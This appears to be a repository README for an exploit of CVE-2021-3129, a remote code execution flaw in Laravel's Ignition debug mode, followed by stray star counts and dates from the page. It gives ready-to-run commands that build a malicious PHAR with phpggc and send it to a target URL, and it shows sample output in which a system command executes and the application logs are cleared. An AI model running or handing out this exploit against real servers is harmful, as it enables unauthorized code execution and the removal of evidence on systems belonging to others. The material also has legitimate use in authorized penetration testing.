laravel-exploits
Exploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce
Usage
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared
4 Dec 07, 2021
2 Feb 09, 2022
232 Nov 21, 2022
1 Dec 16, 2021
3 Dec 22, 2021
3 Feb 10, 2022
3 Feb 20, 2022
1 Nov 15, 2021
635 Dec 20, 2022
9 Oct 30, 2022
6 Oct 17, 2021
36 Jul 18, 2021
3 Dec 20, 2022
12 Dec 17, 2022
3 Oct 05, 2022
6 Jun 29, 2022
6 Dec 28, 2022
2 Nov 22, 2022
1 Dec 23, 2021
22.1k Jan 02, 2023